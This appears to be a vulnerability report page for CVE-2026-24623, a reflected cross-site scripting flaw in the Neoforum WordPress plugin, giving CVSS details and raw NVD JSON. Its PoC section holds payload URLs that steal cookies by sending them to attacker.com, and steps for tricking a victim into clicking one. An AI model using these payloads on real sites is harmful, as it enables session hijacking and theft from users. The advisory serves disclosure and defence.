Security Vulnerability Report
中文
CVE-2026-24623 CVSS 7.1 HIGH

CVE-2026-24623

Published: 2026-01-23 15:16:21
Last Modified: 2026-04-28 15:16:21

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in saeros1984 Neoforum neoforum allows Reflected XSS.This issue affects Neoforum: from n/a through <= 1.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Neoforum WordPress插件 <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-24623 PoC - Reflected XSS in Neoforum WordPress Plugin --> <!-- Attack URL: Replace 'YOUR_TARGET' with vulnerable site --> <!-- PoC demonstrates how to inject JavaScript via URL parameter --> <!-- Basic PoC - Inject alert with cookie theft --> PoC URL: https://YOUR_TARGET/wp-content/plugins/neoforum/?search=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E <!-- More sophisticated PoC - Cookie stealing and exfiltration --> <!-- http://YOUR_TARGET/wp-content/plugins/neoforum/?search=%22%3E%3Cimg%20src=x%20onerror=%22fetch('https://attacker.com/steal?cookie='%2Bdocument.cookie)%22%3E --> <!-- PoC - Session hijacking via JavaScript injection --> <!-- http://YOUR_TARGET/wordpress/?neoforum_param=%3Cscript%3Edocument.location='https://attacker.com/phishing?session='%2Bdocument.cookie%3C/script%3E --> <!-- Usage: 1. Replace YOUR_TARGET with the vulnerable WordPress site URL 2. Encode the payload if needed 3. Trick victim into clicking the crafted URL 4. Execute malicious JavaScript in victim's browser -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24623", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:21.487", "lastModified": "2026-04-28T15:16:20.550", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in saeros1984 Neoforum neoforum allows Reflected XSS.This issue affects Neoforum: from n/a through <= 1.0."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en saeros1984 Neoforum neoforum permite XSS Reflejado. Este problema afecta a Neoforum: desde n/a hasta &lt;= 1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/neoforum/vulnerability/wordpress-neoforum-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}